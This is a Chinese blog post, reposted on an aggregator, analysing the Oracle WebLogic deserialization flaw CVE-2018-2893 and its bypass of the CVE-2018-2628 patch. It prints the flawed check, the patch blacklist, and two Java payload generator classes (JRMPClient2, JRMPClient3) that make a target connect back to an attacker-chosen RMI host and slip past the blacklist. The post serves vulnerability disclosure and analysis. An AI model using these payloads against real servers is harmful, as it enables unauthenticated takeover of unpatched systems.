美文网首页渗透测试
CVE-2018-2893:Oracle WebLogic Se

CVE-2018-2893:Oracle WebLogic Se

作者: 道书简 | 来源:发表于2018-09-19 17:30 被阅读38次

    0x00 漏洞描述

      7月18日,Oracle官方发布了季度补丁更新,其中修复了一个 Oracle WebLogic Server 远程代码执行漏洞CVE-2018-2893,此漏洞是对编号为 CVE-2018-2628 修复的绕过,攻击者同样可以在未身份验证的情况下对WebLogic进行攻击。
    目前相关PoC已经公开,建议相关用户尽快进行评估升级。

    0x01 漏洞影响面

      影响版本:
      WebLogic 10.3.6.0 WebLogic 12.1.3.0 WebLogic 12.2.1.2 WebLogic 12.2.1.3

    0x02 漏洞详情

    • 漏洞概况
        WebLogic Server使用T3协议在WebLogic Server和客户端间传输数据和通信,由于WebLogic的T3协议和Web协议使用相同的端口,导致在默认情况下,WebLogic Server T3协议通信和Web端具有相同的访问权限。 易受攻击的WebLogic服务允许未经身份验证的攻击者通过T3网络访问及破坏Oracle WebLogic Server。此漏洞的成功攻击可能导致攻击者接管Oracle WebLogic Server,造成远程代码执行。
    • CVE-2018-2628
        InboundMsgAbbrev 使用 resolveProxyClass 来处理 rmi 接口类型,但仅仅只是对java.rmi.registry.Registry 进行比较判断,可通过其他rmi接口构造绕过。
     protected Class<?> resolveProxyClass(String[] interfaces) throws IOException, 
ClassNotFoundException
 { String[] arr$ = interfaces;
 int len$ = interfaces.length;

    for(int i$ = 0; i$ < len$; ++i$) {
        String intf = arr$[i$];
        if(intf.equals("java.rmi.registry.Registry")) {
            throw new InvalidObjectException("Unauthorized proxy deserialization");
        }
    }

    return super.resolveProxyClass(interfaces);
}

      在公开 PoC 中,通过序列化RemoteObjectInvocationHandler,利用UnicastRef建立TCP连接获取远端的RMI registry,加载后会进行readObject解析,通过反序列化漏洞造成远程代码执行。

     public class JRMPClient2 extends PayloadRunner implements ObjectPayload {

    public Activator getObject ( final String command ) throws Exception {

        String host;
        int port;
        int sep = command.indexOf(':');
        if ( sep < 0 ) {
            port = new Random().nextInt(65535);
            host = command;
        }
        else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }
        ObjID id = new ObjID(new Random().nextInt()); // RMI registry
        TCPEndpoint te = new TCPEndpoint(host, port);
        UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
        RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
        Activator proxy = (Activator) Proxy.newProxyInstance(JRMPClient2.class.getClassLoader(), new Class[] {
            Activator.class
        }, obj);
        return proxy;
    }


    public static void main ( final String[] args ) throws Exception {
        Thread.currentThread().setContextClassLoader(JRMPClient2.class.getClassLoader());
        PayloadRunner.run(JRMPClient2.class, args);
    }
}

      补丁(p27395085_1036_Generic) ,在WeblogicFilterConfig.class 的黑名单中添加了sun.rmi.server.UnicastRef, 进行防御。

     private static final String[] DEFAULT_BLACKLIST_CLASSES = new String[]
{"org.codehaus.groovy.runtime.ConvertedClosure", "org.codehaus.groovy.runtime.ConversionHandler", 
"org.codehaus.groovy.runtime.MethodClosure", 
"org.springframework.transaction.support.AbstractPlatformTransactionManager", 
"sun.rmi.server.UnicastRef"};

    补丁绕过

      WebLogic 内部类 weblogic.jms.common.StreamMessageImpl 可被序列化并且在反序列化时可以调用RMI的类,可以绕过WebLogic 的黑名单限制。

    public class JRMPClient3 extends PayloadRunner implements ObjectPayload {

    public Object streamMessageImpl(byte[] object) {
        StreamMessageImpl streamMessage = new StreamMessageImpl();
        streamMessage.setDataBuffer(object, object.length);
        return streamMessage;
    }

    public Object getObject (final String command ) throws Exception {
        String host;
        int port;
        int sep = command.indexOf(':');
        if (sep < 0) {
            port = new Random().nextInt(65535);
            host = command;
        }
        else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }
        ObjID objID = new ObjID(new Random().nextInt()); // RMI registry
        TCPEndpoint tcpEndpoint = new TCPEndpoint(host, port);
        UnicastRef unicastRef = new UnicastRef(new LiveRef(objID, tcpEndpoint, false));
        RemoteObjectInvocationHandler remoteObjectInvocationHandler = new RemoteObjectInvocationHandler(unicastRef);
        Object object = Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), new Class[] { Registry.class }, remoteObjectInvocationHandler);
        return streamMessageImpl(Serializer.serialize(object));
    }


    public static void main ( final String[] args ) throws Exception {
        Thread.currentThread().setContextClassLoader(JRMPClient3.class.getClassLoader());
        PayloadRunner.run(JRMPClient3.class, args);
    }
}

    相关文章

      网友评论

        本文标题:CVE-2018-2893:Oracle WebLogic Se

        本文链接:https://www.haomeiwen.com/subject/wkoinftx.html

        延伸阅读

        深度阅读

        • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

        栏目导航

        热点阅读

        渗透测试

        关于我们|服务条款|联系我们|CVE-2018-2893:Oracle WebLogic Se|投稿指南|网站地图|RSS订阅|排版工具|手机版

        提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

        Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

        备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

        本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

        所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!